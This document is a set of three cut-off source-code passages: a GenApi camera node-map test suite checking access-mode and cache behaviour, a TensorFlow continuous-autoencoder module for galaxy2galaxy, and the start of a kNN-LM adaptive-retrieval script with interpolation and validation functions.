<AccessMode>RO</AccessMode>
<pPort>MyPort</pPort>
<Cachable>NoCache</Cachable>
<Sign>Unsigned</Sign>
<Endianess>BigEndian</Endianess>
</IntReg>
<IntSwissKnife Name="C">
<pVariable Name="VAR_A">A</pVariable>
<pVariable Name="VAR_B">B</pVariable>
<Formula>(VAR_A + VAR_B) > 0</Formula>
</IntSwissKnife>
<Integer Name="D">
<pIsAvailable>C</pIsAvailable>
<Value>0</Value>
</Integer>
<Float Name="E">
<pIsAvailable>C</pIsAvailable>
<Value>0</Value>
</Float>
<Command Name="F">
<pIsAvailable>C</pIsAvailable>
<pValue>Helper</pValue>
<CommandValue>1</CommandValue>
</Command>
<IntSwissKnife Name="G">
<pIsAvailable>C</pIsAvailable>
<Formula>0</Formula>
</IntSwissKnife>
<SwissKnife Name="H">
<pIsAvailable>C</pIsAvailable>
<Formula>0</Formula>
</SwissKnife>
<Enumeration Name="I">
<pIsAvailable>C</pIsAvailable>
<EnumEntry Name="EnumValue1">
<Value>0</Value>
</EnumEntry>
<Value>0</Value>
</Enumeration>
<Port Name="J">
<pIsAvailable>C</pIsAvailable>
</Port>
<Register Name="K">
<pIsAvailable>C</pIsAvailable>
<Address>0</Address>
<Length>1</Length>
<AccessMode>RW</AccessMode>
<pPort>MyPort</pPort>
</Register>
<Boolean Name="L">
<pIsAvailable>C</pIsAvailable>
<Value>0</Value>
</Boolean>
<Enumeration Name="M">
<EnumEntry Name="EnumValue1">
<pIsAvailable>C</pIsAvailable>
<Value>0</Value>
</EnumEntry>
<Value>0</Value>
</Enumeration>
<Integer Name="N">
<pIsImplemented>C</pIsImplemented>
<Value>0</Value>
</Integer>
<Integer Name="O">
<pIsLocked>C</pIsLocked>
<Value>0</Value>
</Integer>
<Integer Name="P">
<pValue>D</pValue>
</Integer>
<IntSwissKnife Name="isk">
<pVariable Name="VAR_A">A</pVariable>
<pVariable Name="VAR_B">B</pVariable>
<Formula>VAR_A + VAR_B</Formula>
</IntSwissKnife>
<SwissKnife Name="fsk">
<pVariable Name="VAR_A">A</pVariable>
<pVariable Name="VAR_B">B</pVariable>
<Formula>VAR_A + VAR_B</Formula>
</SwissKnife>
<IntConverter Name="ic">
<pVariable Name="VAR_A">A</pVariable>
<pVariable Name="VAR_B">B</pVariable>
<FormulaTo>0</FormulaTo>
<FormulaFrom>VAR_A + VAR_B</FormulaFrom>
<pValue>Helper</pValue>
</IntConverter>
<Converter Name="fc">
<pVariable Name="VAR_A">A</pVariable>
<pVariable Name="VAR_B">B</pVariable>
<FormulaTo>0</FormulaTo>
<FormulaFrom>VAR_A + VAR_B</FormulaFrom>
<pValue>Helper</pValue>
</Converter>
<Integer Name="Helper">
<ImposedAccessMode>WO</ImposedAccessMode>
<Value>0</Value>
</Integer>
<Port Name="MyPort"/>
"""
Camera = CNodeMapRef()
Camera._LoadXMLFromFile("GenApiTest", "NodeTestSuite_TestAccessModeCache")
Camera._Connect(Port, "MyPort")
# (connect also the other tested port)
PortJ = CTestPort()
Camera._Connect(PortJ, "J")
lA = Camera.GetNode("A")
lB = Camera.GetNode("B")
lD = Camera.GetNode("D")
lE = Camera.GetNode("E")
lF = Camera.GetNode("F")
lG = Camera.GetNode("G")
lH = Camera.GetNode("H")
lI = Camera.GetNode("I")
lJ = Camera.GetNode("J")
lK = Camera.GetNode("K")
lL = Camera.GetNode("L")
lM = Camera.GetNode("M")
lN = Camera.GetNode("N")
lO = Camera.GetNode("O")
lP = Camera.GetNode("P")
# Validate registers initial state
self.assertTrue(lA.GetValue() == 0)
self.assertTrue(lB.GetValue() == 0)
# Validate expected original access mode: NA.
# Required as it populates the access mode cache.
self.assertTrue(not IsAvailable(lD.GetAccessMode()))
self.assertTrue(not IsAvailable(lE.GetAccessMode()))
self.assertTrue(not IsAvailable(lF.GetAccessMode()))
self.assertTrue(not IsAvailable(lG.GetAccessMode()))
self.assertTrue(not IsAvailable(lH.GetAccessMode()))
self.assertTrue(not IsAvailable(lI.GetAccessMode()))
self.assertTrue(not IsAvailable(lJ.GetAccessMode()))
self.assertTrue(not IsAvailable(lK.GetAccessMode()))
self.assertTrue(not IsAvailable(lL.GetAccessMode()))
self.assertTrue(not IsAvailable(lM.GetAccessMode()))
self.assertTrue(not IsImplemented(lN.GetAccessMode()))
self.assertTrue(IsWritable(lO.GetAccessMode()))
self.assertTrue(not IsAvailable(lP.GetAccessMode()))
# Directly change A value
lNewAVal = 4
lAccessA = RW # Out, irrelevant
Port.UpdateEntry(0x4000, cast_data("uint32_t", LittleEndian, lNewAVal), lAccessA)
# Directly change B value
lNewBVal = 2
lAccessB = RW # Out, irrelevant
Port.UpdateEntry(0x4004, cast_data("uint32_t", LittleEndian, lNewBVal), lAccessB)
# Now the big test - with 0000378 fixed, should pass
self.assertTrue(IsAvailable(lD.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lE.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lF.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lG.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lH.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lI.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lJ.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lK.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lL.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lM.Node.GetAccessMode()))
self.assertTrue(IsImplemented(lN.Node.GetAccessMode()))
self.assertTrue(not IsWritable(lO.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lP.Node.GetAccessMode()))
isk = Camera.GetNode("isk")
fsk = Camera.GetNode("fsk")
ic = Camera.GetNode("ic")
fc = Camera.GetNode("fc")
self.assertEqual(NoCache, isk.GetNode().GetCachingMode())
self.assertEqual(NoCache, fsk.GetNode().GetCachingMode())
self.assertEqual(NoCache, ic.GetNode().GetCachingMode())
self.assertEqual(NoCache, fc.GetNode().GetCachingMode())
def test_IsUncached(self):
# if(GenApiSchemaVersion == v1_0)
# return
"""[ GenApiTest@NodeTestSuite_TestIsUncached.xml|gxml
<Integer Name="Value">
<pValue>ValueReg</pValue>
</Integer>
<IntReg Name="ValueReg">
<pBlockPolling>PollingDisabler</pBlockPolling>
<Address>0x0000</Address>
<Length>4</Length>
<AccessMode>RW</AccessMode>
<pPort>Port</pPort>
<PollingTime>1000</PollingTime>
<Sign>Unsigned</Sign>
<Endianess>LittleEndian</Endianess>
</IntReg>
<Integer Name="PollingDisabler">
<pIsAvailable>PollingDisablerAvail</pIsAvailable>
<Value>0</Value>
</Integer>
<Integer Name="PollingDisablerAvail">
<Value>1</Value>
</Integer>
<Port Name="Port"/>
"""
Camera = CNodeMapRef()
Camera._LoadXMLFromFile("GenApiTest", "NodeTestSuite_TestIsUncached")
# type definition of TestIsUncached is above
regs = [("Value", "uint32_t", 0, RW, LittleEndian), ]
Port = CStructTestPort(regs)
self.assertEqual(intfIPort, Port.GetPrincipalInterfaceType())
Port.Value = 42
Camera._Connect(Port, "Port")
Value = Camera.GetNode("Value")
ValueReg = Camera.GetNode("ValueReg")
PollingDisabler = Camera.GetNode("PollingDisabler")
PollingDisablerAvail = Camera.GetNode("PollingDisablerAvail")
self.assertEqual(42, Value.GetValue())
# Change register value since the register is cached the Value node will not notice...
Port.Value = 13
self.assertEqual(42, Value.GetValue())
# ...until the register is polled
Camera._Poll(2000)
self.assertEqual(13, Value.GetValue())
# Now we do it again but first we block the polling
Port.Value = 42
PollingDisabler.SetValue(1)
# setting the disabler invalidates the nodes so we have to fill the caches again by reading the Value
self.assertEqual(42, Value.GetValue())
# Change register value since the register is cached the Value node will not notice...
Port.Value = 13
self.assertEqual(42, Value.GetValue())
# ...until the register is polled
Camera._Poll(2000)
# But the polling didn't happen so the cached value is still valid
self.assertEqual(42, Value.GetValue())
# If we invalidate the Value node explicitly...
Value.GetNode().InvalidateNode()
# ...nothing happens because the cache of the register node was not invalidated
self.assertEqual(42, Value.GetValue())
# However if we invalidate the ValueReg node explicitely...
ValueReg.GetNode().InvalidateNode()
# ... we finally get the value
self.assertEqual(13, Value.GetValue())
# now make the disabler unreadable and repeate similar tests
PollingDisablerAvail.SetValue(0)
self.assertTrue(not IsAvailable(Value)) ## is this expected?
#
# struct MyCallbackUtility
# {
# static void Reset() { m_Count=0 }
# static void Callback( INode* ) { ++m_Count }
# static uint32_t Count() { return m_Count }
# private:
# static unsigned m_Count
# }
# unsigned MyCallbackUtility::m_Count=0
#
#
def test_WriteCache(self):
"""[ GenApiTest@NodeTestSuite_TestWriteCache.xml|gxml
<Boolean Name="IOBit">
<pValue>IOBitInteger</pValue>
</Boolean>
<Integer Name="IOBitSelector">
<Value>0</Value>
<Min>0</Min>
<Max>7</Max>
</Integer>
<IntConverter Name="IOBitInteger">
<pVariable Name="SEL">IOBitSelector</pVariable>
<pVariable Name="CUR">IORegister</pVariable>
<!-- To = From ? CUR | 1 << SEL : CUR & ~(1 << SEL) -->
<FormulaTo>(FROM) ? (CUR | (1 << SEL)) : (CUR & (~ (1 << SEL)))</FormulaTo>
<!-- From = To >> SEL & 1 -->
<FormulaFrom>(TO >> SEL) & 1</FormulaFrom>
<pValue>IORegister</pValue>
<Slope>Varying</Slope>
</IntConverter>
<IntReg Name="IORegister">
<Address>0x00000000</Address>
<Length>1</Length>
<AccessMode>RW</AccessMode>
<pPort>Device</pPort>
<Cachable>WriteThrough</Cachable>
<Sign>Unsigned</Sign>
<Endianess>LittleEndian</Endianess>
</IntReg>
<Port Name="Device" >
</Port>
"""
Camera = CNodeMapRef()
Camera._LoadXMLFromFile("GenApiTest", "NodeTestSuite_TestWriteCache")
regs = [("bit", "uint8_t,bits", 0, RW, LittleEndian),
]
Port = CStructTestPort(regs)
print(Port.struct_entries.keys())
Port.bit0 = 0
Port.bit1 = 1
Port.bit2 = 0
Port.bit3 = 1
Port.bit4 = 0
Port.bit5 = 1
Port.bit6 = 0
Port.bit7 = 1
Camera._Connect(Port, "Device")
IOBitSelector = Camera.GetNode("IOBitSelector")
IOBit = Camera.GetNode("IOBit")
IORegister = Camera.GetNode("IORegister")
#################/
# test reading
# prepare measurement
Port.InvalidateNode()
Port.ResetStatistics()
self.assertEqual(0, Port.GetNumReads())
self.assertEqual(0, Port.GetNumWrites())
self.assertTrue(not IORegister.IsValueCacheValid())
print("write")
Port.bit2 = 0
# read bit2
IOBitSelector.SetValue(2)
self.assertEqual(0, Port.GetNumReads())
self.assertEqual(0, Port.GetNumWrites())
# first time
self.assertEqual(False, IOBit.GetValue())
self.assertEqual(1, Port.GetNumReads())
self.assertEqual(0, Port.GetNumWrites())
self.assertTrue(IORegister.IsValueCacheValid())
# second time
self.assertEqual(False, IOBit.GetValue())
self.assertEqual(1, Port.GetNumReads())
self.assertEqual(0, Port.GetNumWrites())
self.assertTrue(IORegister.IsValueCacheValid())
#################/
# test writing
# prepare measurement
Port.InvalidateNode()
Port.ResetStatistics()
self.assertEqual(0, Port.GetNumReads())
self.assertEqual(0, Port.GetNumWrites())
self.assertTrue(not IORegister.IsValueCacheValid())
# write bit3
IOBitSelector.SetValue(3)
self.assertEqual(0, Port.GetNumReads())
self.assertEqual(0, Port.GetNumWrites())
# first time
IOBit.SetValue(False)
self.assertEqual(1, Port.GetNumReads())
self.assertEqual(1, Port.GetNumWrites())
self.assertEqual(0, Port.bit3)
self.assertTrue(IORegister.IsValueCacheValid())
# second time
IOBit.SetValue(True)
self.assertEqual(1, Port.GetNumReads())
self.assertEqual(2, Port.GetNumWrites())
self.assertEqual(True, Port.bit3)
self.assertTrue(IORegister.IsValueCacheValid())
#
# class NodeNameTester : public std::unary_function<INode*, bool>
# {
# gcstring Name
# public:
# NodeNameTester (const char _Name[]) : Name(_Name) {}
# bool operator() (INode *pNode) const { return pNode.GetName()==Name}
# }
#
# class NodeFinder
# {
# NodeNameTester Test
# public:
# NodeFinder (const char _Name[]) : Test(_Name) {}
# bool operator() (NodeList_t &List) const { return count_if(List.begin(), List.end(), Test)>0}
# }
def test_LinkTypes(self):
# if(GenApiSchemaVersion == v1_0)
# return
"""[ GenApiTest@NodeTestSuite_TestLinkTypes.xml|gxml
<Integer Name="TheNode">
<pInvalidator>G</pInvalidator>
<pValue>A</pValue>
<pMin>B</pMin>
</Integer>
<Integer Name="A">
<pValue>C</pValue>
</Integer>
<Integer Name="B">
<Value>0</Value>
</Integer>
<Integer Name="C">
<Value>0</Value>
</Integer>
<Integer Name="D">
<pValue>TheNode</pValue>
</Integer>
<Integer Name="E">
<pValue>D</pValue>
</Integer>
<Integer Name="F">
<pInvalidator>TheNode</pInvalidator>
<Value>0</Value>
</Integer>
<Integer Name="G">
<pInvalidator>H</pInvalidator>
<Value>0</Value>
</Integer>
<Integer Name="H">
<Value>0</Value>
</Integer>
"""
Camera = CNodeMapRef()
Camera._LoadXMLFromFile("GenApiTest", "NodeTestSuite_TestLinkTypes")
Node = Camera.GetNode("TheNode")
# NodeList_t Children
# NodeFinder FindA("A")
# NodeFinder FindB("B")
# NodeFinder FindC("C")
# NodeFinder FindD("D")
# NodeFinder FindE("E")
# NodeFinder FindF("F")
# NodeFinder FindG("G")
# NodeFinder FindH("H")
# Children.clear ()
# Node.GetChildren (Children, ctWritingChildren)
# self.assertEqual (1, Children.size())
# self.assertTrue (FindA(Children))
# self.assertTrue (not FindB(Children))
# self.assertTrue (not FindC(Children))
# Children.clear ()
# Node.GetChildren (Children, ctReadingChildren)
# self.assertEqual (2, Children.size())
# self.assertTrue (FindA(Children))
# self.assertTrue (FindB(Children))
# self.assertTrue (not FindC(Children))
# Children.clear ()
# Node.GetChildren (Children, ctTerminalNodes)
# self.assertEqual (1, Children.size())
# self.assertTrue (not FindA(Children))
# self.assertTrue (not FindB(Children))
# self.assertTrue (FindC(Children))
# Children.clear ()
# Node.GetChildren (Children, ctDependingNodes)
# self.assertEqual (3, Children.size())
# self.assertTrue (FindD(Children))
# self.assertTrue (FindE(Children))
# self.assertTrue (FindF(Children))
# Children.clear ()
# Node.GetChildren (Children, | |
<reponame>gitter-badger/galaxy2galaxy
# coding=utf-8
# Copyright 2019 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Autoencoders."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensor2tensor.layers import common_attention
from tensor2tensor.layers import common_hparams
from tensor2tensor.layers import common_layers
from tensor2tensor.layers import discretization
from tensor2tensor.layers import latent_layers
from tensor2tensor.layers import modalities
from tensor2tensor.utils import t2t_model
from tensor2tensor.models.research import autoencoders
from galaxy2galaxy.utils import registry
import tensorflow as tf
def pack_images(images, rows, cols):
"""Helper utility to make a field of images."""
shape = tf.shape(images)
width = shape[-3]
height = shape[-2]
depth = shape[-1]
images = tf.reshape(images, (-1, width, height, depth))
batch = tf.shape(images)[0]
rows = tf.minimum(rows, batch)
cols = tf.minimum(batch // rows, cols)
images = images[:rows * cols]
images = tf.reshape(images, (rows, cols, width, height, depth))
images = tf.transpose(images, [0, 2, 1, 3, 4])
images = tf.reshape(images, [1, rows * width, cols * height, depth])
return images
@registry.register_model
class ContinuousAutoencoderBasic(autoencoders.AutoencoderBasic):
"""Continuous version of the basic Autoencoder"""
def reconstruction_loss(self, values, targets):
hparams = self.hparams
pz = tf.reduce_sum(tf.abs(values - targets)**2, axis=[-1, -2, -3]) / hparams.reconstruction_loss_sigma**2
return tf.reduce_mean(pz)
def image_summary(self, name, image_logits, max_outputs=1, rows=8, cols=8):
"""Helper for image summaries that are safe on TPU."""
if len(image_logits.get_shape()) != 4:
tf.logging.info("Not generating image summary, maybe not an image.")
return
return tf.summary.image(
name, pack_images(image_logits, rows, cols),
#common_layers.tpu_safe_image_summary(pack_images(tensor, rows, cols)),
max_outputs=max_outputs)
def body(self, features):
hparams = self.hparams
is_training = hparams.mode == tf.estimator.ModeKeys.TRAIN
encoder_layers = None
self.is1d = hparams.sample_width == 1
if (hparams.mode != tf.estimator.ModeKeys.PREDICT
or self._encode_on_predict):
labels = features["targets_raw"]
labels_shape = common_layers.shape_list(labels)
# handle videos
if len(labels.shape) == 5:
labels = time_to_channels(labels)
shape = common_layers.shape_list(labels)
x = tf.expand_dims(labels, axis=-1)
x = self.embed(x)
target_codes = x
print(x)
if shape[2] == 1:
self.is1d = True
# Run encoder.
x, encoder_layers = self.encoder(x)
# Bottleneck.
b, b_loss = self.bottleneck(x)
xb_loss = 0.0
b_shape = common_layers.shape_list(b)
self._cur_bottleneck_tensor = b
res_size = common_layers.shape_list(x)[-1]
b = self.unbottleneck(b, res_size)
if not is_training:
x = b
else:
l = 2**hparams.num_hidden_layers
warm_step = int(hparams.bottleneck_warmup_steps * 0.25 * l)
nomix_p = common_layers.inverse_lin_decay(warm_step) + 0.01
if common_layers.should_generate_summaries():
tf.summary.scalar("nomix_p_bottleneck", nomix_p)
rand = tf.random_uniform(common_layers.shape_list(x))
# This is the distance between b and x. Having this as loss helps learn
# the bottleneck function, but if we back-propagated to x it would be
# minimized by just setting x=0 and b=0 -- so we don't want too much
# of the influence of this, and we stop-gradient to not zero-out x.
x_stop = tf.stop_gradient(x)
xb_loss = tf.reduce_mean(tf.reduce_sum(
tf.squared_difference(x_stop, b), axis=-1))
# To prevent this loss from exploding we clip at 1, but anneal clipping.
clip_max = 1.0 / common_layers.inverse_exp_decay(
warm_step, min_value=0.001)
xb_clip = tf.maximum(tf.stop_gradient(xb_loss), clip_max)
xb_loss *= clip_max / xb_clip
x = tf.where(tf.less(rand, nomix_p), b, x)
else:
if self._cur_bottleneck_tensor is None:
b = self.sample()
else:
b = self._cur_bottleneck_tensor
self._cur_bottleneck_tensor = b
res_size = self.hparams.hidden_size * 2**self.hparams.num_hidden_layers
res_size = min(res_size, hparams.max_hidden_size)
x = self.unbottleneck(b, res_size)
# Run decoder.
x = self.decoder(x, encoder_layers)
# Cut to the right size and mix before returning.
res = x
if hparams.mode != tf.estimator.ModeKeys.PREDICT:
res = x[:, :shape[1], :shape[2], :]
# Final dense layer.
res = tf.layers.dense(
res, self.num_channels * hparams.hidden_size, name="res_dense")
output_shape = common_layers.shape_list(res)[:-1] + [
self.num_channels, self.hparams.hidden_size
]
res = tf.reshape(res, output_shape)
if hparams.mode == tf.estimator.ModeKeys.PREDICT:
reconstr = tf.layers.dense(res, self.num_channels, name="autoencoder_final")
return reconstr, {"bottleneck_loss": 0.0}
# Losses.
losses = {
"bottleneck_extra": b_loss,
"bottleneck_l2": hparams.bottleneck_l2_factor * xb_loss
}
reconstr = tf.layers.dense(res, self.num_channels, name="autoencoder_final")
reconstr = tf.reshape(reconstr, labels_shape)
targets_loss = self.reconstruction_loss(reconstr, labels)
losses["training"] = targets_loss
self.image_summary("inputs", labels)
self.image_summary("ae", reconstr)
return reconstr, losses
@registry.register_model
class ContinuousAutoencoderResidual(ContinuousAutoencoderBasic):
"""Residual autoencoder."""
def dropout(self, x):
is_training = self.hparams.mode == tf.estimator.ModeKeys.TRAIN
hparams = self.hparams
if hparams.dropout <= 0.0 or not is_training:
return x
warm_step = hparams.bottleneck_warmup_steps * 2**hparams.num_hidden_layers
dropout = common_layers.inverse_lin_decay(warm_step // 2) * hparams.dropout
return common_layers.dropout_with_broadcast_dims(
x, 1.0 - dropout, broadcast_dims=[-1])
def encoder(self, x):
with tf.variable_scope("encoder"):
hparams = self.hparams
layers = []
kernel, strides = self._get_kernel_and_strides()
residual_kernel = (hparams.residual_kernel_height,
hparams.residual_kernel_width)
residual_kernel1d = (hparams.residual_kernel_height, 1)
residual_kernel = residual_kernel1d if self.is1d else residual_kernel
residual_conv = tf.layers.conv2d
if hparams.residual_use_separable_conv:
residual_conv = tf.layers.separable_conv2d
# Down-convolutions.
for i in range(hparams.num_hidden_layers):
with tf.variable_scope("layer_%d" % i):
x = self.make_even_size(x)
layers.append(x)
x = self.dropout(x)
filters = hparams.hidden_size * 2**(i + 1)
filters = min(filters, hparams.max_hidden_size)
x = common_attention.add_timing_signal_nd(x)
x = tf.layers.conv2d(
x,
filters,
kernel,
strides=strides,
padding="SAME",
activation=common_layers.belu,
name="strided")
y = x
y = tf.nn.dropout(y, 1.0 - hparams.residual_dropout)
for r in range(hparams.num_residual_layers):
residual_filters = filters
if r < hparams.num_residual_layers - 1:
residual_filters = int(
filters * hparams.residual_filter_multiplier)
y = residual_conv(
y,
residual_filters,
residual_kernel,
padding="SAME",
activation=common_layers.belu,
name="residual_%d" % r)
x += y
x = common_layers.layer_norm(x, name="ln")
return x, layers
def decoder(self, x, encoder_layers=None):
with tf.variable_scope("decoder"):
hparams = self.hparams
is_training = self.hparams.mode == tf.estimator.ModeKeys.TRAIN
kernel, strides = self._get_kernel_and_strides()
residual_kernel = (hparams.residual_kernel_height,
hparams.residual_kernel_width)
residual_kernel1d = (hparams.residual_kernel_height, 1)
residual_kernel = residual_kernel1d if self.is1d else residual_kernel
residual_conv = tf.layers.conv2d
if hparams.residual_use_separable_conv:
residual_conv = tf.layers.separable_conv2d
# Up-convolutions.
for i in range(hparams.num_hidden_layers):
j = hparams.num_hidden_layers - i - 1
if is_training:
nomix_p = common_layers.inverse_lin_decay(
int(hparams.bottleneck_warmup_steps * 0.25 * 2**j)) + 0.01
if common_layers.should_generate_summaries():
tf.summary.scalar("nomix_p_%d" % j, nomix_p)
filters = hparams.hidden_size * 2**j
filters = min(filters, hparams.max_hidden_size)
with tf.variable_scope("layer_%d" % i):
j = hparams.num_hidden_layers - i - 1
x = tf.layers.conv2d_transpose(
x,
filters,
kernel,
strides=strides,
padding="SAME",
activation=common_layers.belu,
name="strided")
y = x
for r in range(hparams.num_residual_layers):
residual_filters = filters
if r < hparams.num_residual_layers - 1:
residual_filters = int(
filters * hparams.residual_filter_multiplier)
y = residual_conv(
y,
residual_filters,
residual_kernel,
padding="SAME",
activation=common_layers.belu,
name="residual_%d" % r)
x += tf.nn.dropout(y, 1.0 - hparams.residual_dropout)
x = common_layers.layer_norm(x, name="ln")
x = common_attention.add_timing_signal_nd(x)
if encoder_layers is not None:
enc_x = encoder_layers[j]
enc_shape = common_layers.shape_list(enc_x)
x_mix = x[:enc_shape[0], :enc_shape[1], :enc_shape[2], :]
if is_training: # Mix at the beginning of training.
rand = tf.random_uniform(common_layers.shape_list(x_mix))
x_mix = tf.where(tf.less(rand, nomix_p), x_mix, enc_x)
x = x_mix
return x
@registry.register_model
class ContinuousAutoencoderResidualVAE(ContinuousAutoencoderResidual):
"""Residual VAE autoencoder."""
def bottleneck(self, x):
hparams = self.hparams
z_size = hparams.bottleneck_bits
x_shape = common_layers.shape_list(x)
with tf.variable_scope("vae"):
mu = tf.layers.dense(x, z_size, name="mu")
if hparams.mode != tf.estimator.ModeKeys.TRAIN:
return mu, 0.0 # No sampling or kl loss on eval.
log_sigma = tf.layers.dense(x, z_size, name="log_sigma")
epsilon = tf.random_normal(x_shape[:-1] + [z_size])
z = mu + tf.exp(log_sigma / 2) * epsilon
kl = 0.5 * tf.reduce_mean(
tf.expm1(log_sigma) + tf.square(mu) - log_sigma, axis=-1)
free_bits = z_size // 4
kl_loss = tf.reduce_mean(tf.maximum(kl - free_bits, 0.0))
return z, kl_loss * hparams.kl_beta
def sample(self, features=None, shape=None):
del features
hparams = self.hparams
div_x = 2**hparams.num_hidden_layers
div_y = 1 if self.is1d else 2**hparams.num_hidden_layers
size = [
hparams.batch_size, hparams.sample_height // div_x,
hparams.sample_width // div_y, hparams.bottleneck_bits
]
size = size if shape is None else shape
return tf.random_normal(size)
@registry.register_model
class ContinuousAutoencoderBasicDiscrete(ContinuousAutoencoderBasic):
"""Discrete autoencoder."""
def bottleneck(self, x):
hparams = self.hparams
x = tf.tanh(tf.layers.dense(x, hparams.bottleneck_bits, name="bottleneck"))
d = x + tf.stop_gradient(2.0 * tf.to_float(tf.less(0.0, x)) - 1.0 - x)
if hparams.mode == tf.estimator.ModeKeys.TRAIN:
noise = tf.random_uniform(common_layers.shape_list(x))
noise = 2.0 * tf.to_float(tf.less(hparams.bottleneck_noise, noise)) - 1.0
d *= noise
x = common_layers.mix(d, x, hparams.discretize_warmup_steps,
hparams.mode == tf.estimator.ModeKeys.TRAIN)
return x, 0.0
def sample(self, features=None, shape=None):
del features
hp = self.hparams
div_x = 2**hp.num_hidden_layers
div_y = 1 if self.is1d else 2**hp.num_hidden_layers
size = [
hp.batch_size, hp.sample_height // div_x, hp.sample_width // div_y,
hp.bottleneck_bits
]
size = size if shape is None else shape
rand = tf.random_uniform(size)
return 2.0 * tf.to_float(tf.less(0.5, rand)) - 1.0
@registry.register_model
class ContinuousAutoencoderResidualDiscrete(ContinuousAutoencoderResidual):
"""Discrete residual autoencoder."""
def variance_loss(self, b):
part = tf.random_uniform(common_layers.shape_list(b))
selection = tf.to_float(tf.less(part, tf.random_uniform([])))
selection_size = tf.reduce_sum(selection)
part_avg = tf.abs(tf.reduce_sum(b * selection)) / (selection_size + 1)
return part_avg
def bottleneck(self, x, bottleneck_bits=None): # pylint: disable=arguments-differ
if bottleneck_bits is not None:
old_bottleneck_bits = self.hparams.bottleneck_bits
self.hparams.bottleneck_bits = bottleneck_bits
res, loss = discretization.parametrized_bottleneck(x, self.hparams)
if bottleneck_bits is not None:
self.hparams.bottleneck_bits = old_bottleneck_bits
return res, loss
def unbottleneck(self, x, res_size, reuse=None):
with tf.variable_scope("unbottleneck", reuse=reuse):
return discretization.parametrized_unbottleneck(x, res_size, self.hparams)
| |
<filename>ef_knnlm/domain_adaptation/adaptive_retrieval/adaptive_retrieval.py
import json
import sys
import os
import argparse
import time
import torch
import torch.nn as nn
import torch.optim as optim
import numpy as np
from collections import Counter, OrderedDict
from scipy.special import logsumexp
from datasets import load_dataset
from moe_modules import MLPMOE, LSTMMOE, TokenFeatureDataset
# from sklearn.model_selection import train_test_split
# from sklearn.preprocessing import StandardScaler
# from sklearn.metrics import accuracy_score, precision_recall_fscore_support
class Logger(object):
def __init__(self, output_file):
self.terminal = sys.stdout
self.log = open(output_file, "a")
def write(self, message):
print(message, end="", file=self.terminal, flush=True)
print(message, end="", file=self.log, flush=True)
def flush(self):
self.terminal.flush()
self.log.flush()
def validate(val_dataloader, model, args):
model.eval()
model.epoch_update()
running_loss = 0.
nsamples = 0
prediction_dict = {}
for i, sample in enumerate(val_dataloader, 0):
inputs, lm_scores, knn_scores= sample['feature'], sample['lm_scores'], sample['knn_scores']
# inputs, labels = sample_check['feature'], sample_check['label']
# import pdb;pdb.set_trace()
log_weight = model(inputs)
cross_entropy = log_weight + torch.stack((lm_scores, knn_scores), dim=-1)
# (B,)
cross_entropy = -torch.logsumexp(cross_entropy, dim=-1)
loss = cross_entropy.mean()
ent_loss = loss
if args.l1 > 0:
loss = loss + args.l1 * torch.abs(log_weight.exp()[:,1]).sum() / log_weight.size(0)
# (batch)
preds = log_weight[:, 0]
# import pdb; pdb.set_trace()
for id_, p in zip(sample['id'], preds):
prediction_dict[id_.item()] = p.item()
bsz = next(iter(inputs.values())).size(0)
running_loss += ent_loss.item() * bsz
nsamples += bsz
val_loss = running_loss / nsamples
print(f"val loss: {val_loss:.3f}, ppl: {np.exp(val_loss)}")
return val_loss, prediction_dict
def interpolation(hypos, predictions, lambda_=0.75):
scores = 0
cnt = 0
ndict = 267744
assert len(predictions) == len(hypos)
for i, (hypo, pred) in enumerate(zip(hypos, predictions)):
# if i % 1000 == 0:
# print(f'interpolation processed {i} tokens')
knn_weight = pred * np.log(1-lambda_) + (1 - pred) * (-1e5)
lm_weight = pred * np.log(lambda_)
knn_scores = hypo['knn_s']
lm_scores = hypo['lm_s']
combine = logsumexp(np.stack((knn_scores + knn_weight, lm_scores+lm_weight), axis=-1), axis=-1)
scores += combine.sum()
cnt += 1
return np.exp(-scores / cnt)
def moe_interpolation(hypos, predictions, cutoff=None, random_mask=None, constant_weight=None, threshold=None):
"""perform interpolation while weights are output from a
gating network. only perform retrieval in a certain portion
of tokens when cutoff is not None
"""
scores = 0
cnt = 0
ts = None
# ndict = 267744
assert len(predictions) == len(hypos)
predictions_copy = predictions
if constant_weight is not None:
predictions = [constant_weight] * len(predictions_copy)
if cutoff is not None:
if random_mask is None:
if threshold is not None:
ts = threshold[cutoff * 100]
mask = (predictions_copy >= ts).astype('float')
print(f'actual cutoff {mask.sum() / len(mask)}')
else:
ts = np.sort(predictions_copy)[int(len(predictions_copy) * (1. - cutoff))]
mask = (predictions_copy >= ts).astype('float')
else:
# mask = np.zeros(len(predictions))
# mask[int(len(predictions) * (1. - cutoff)):] = 1
# np.random.shuffle(mask)
# mask = mask.astype('float')
ts = None
mask = random_mask
lm_weights = (1-mask) * predictions + mask * 0.
knn_prob = 1. - np.exp(predictions)
overflow = (knn_prob <= 0)
knn_prob = np.clip(knn_prob, 1e-5, 1)
knn_weights = np.log(knn_prob)
knn_weights[overflow] = -1e5
knn_weights = (1-mask) * knn_weights + mask * (-1e5)
else:
lm_weights = predictions
knn_prob = 1. - np.exp(predictions)
overflow = (knn_prob <= 0)
knn_prob = np.clip(knn_prob, 1e-5, 1)
knn_weights = np.log(knn_prob)
knn_weights[overflow] = -1e5
for hypo, lm_weight, knn_weight in zip(hypos, lm_weights, knn_weights):
knn_scores = hypo['knn_s']
lm_scores = hypo['lm_s']
combine = logsumexp(np.stack((knn_scores + knn_weight, lm_scores+lm_weight), axis=-1), axis=-1)
scores += combine.sum()
cnt += 1
return np.exp(-scores / cnt), ts
def train_test_split(x, y, test_size=0.2):
